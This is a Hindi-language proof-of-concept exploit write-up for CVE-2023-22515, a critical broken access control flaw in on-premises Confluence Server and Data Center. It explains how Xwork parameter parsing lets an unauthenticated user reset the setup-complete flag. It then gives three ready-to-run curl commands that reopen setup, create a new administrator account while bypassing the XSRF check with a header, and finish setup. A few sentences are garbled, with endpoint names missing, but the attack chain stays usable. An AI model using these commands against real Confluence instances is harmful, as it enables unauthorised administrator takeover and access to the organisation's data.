
CVE-2023-22515 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Confluence Server और Data Center में एक गंभीर टूटा हुआ एक्सेस कंट्रोल भेद्यता है, जो बिना प्रमाणीकरण के एडमिन अधिग्रहण को सक्षम बनाता है।
CVE-2023-22515, एक महत्वपूर्ण कमजोरी है जो Confluence Server और Confluence Data Center के ऑन-प्रिमाइसेस इंस्टेंस को प्रभावित करती है, एक Broken Access Control कमजोरी। Attlassian ने CVSS का आधार स्कोर 10.0 दिया है।
1- Xwork इंटरसेप्टर पैरामीटर्स को कैसे पार्स करते हैं, इसके कारण /test.action?one=a setOne()='a' के बराबर है, वैकल्पिक रूप से /test.action?one.two=a getOne().setTwo()="a" के बराबर है
2- /setup/* एंडपॉइंट्स में एक @ParameterSafe कॉल शामिल है जो हमें /setup/setupdb.action?dbConfigInfo.databaseType=postgresql जैसे और का उपयोग करने की अनुमति देता है, हालांकि चूंकि सेटअप पूरा होने के कारण एंडपॉइंट्स अवरुद्ध हैं, इसलिए का उपयोग किया जा सकता है
setget/setup/*/server-info.action3- पूर्ण सेटअप के लिए set विधि खोजें => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);
4- XSRF को बायपास करने के लिए "X-Atlassian-Token" हेडर का उपयोग करें
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
अस्वीकरण: एक्सप्लॉइट मेरे द्वारा खोजा या बनाया नहीं गया था, श्रेय नीचे दिए गए लेखों को जाता है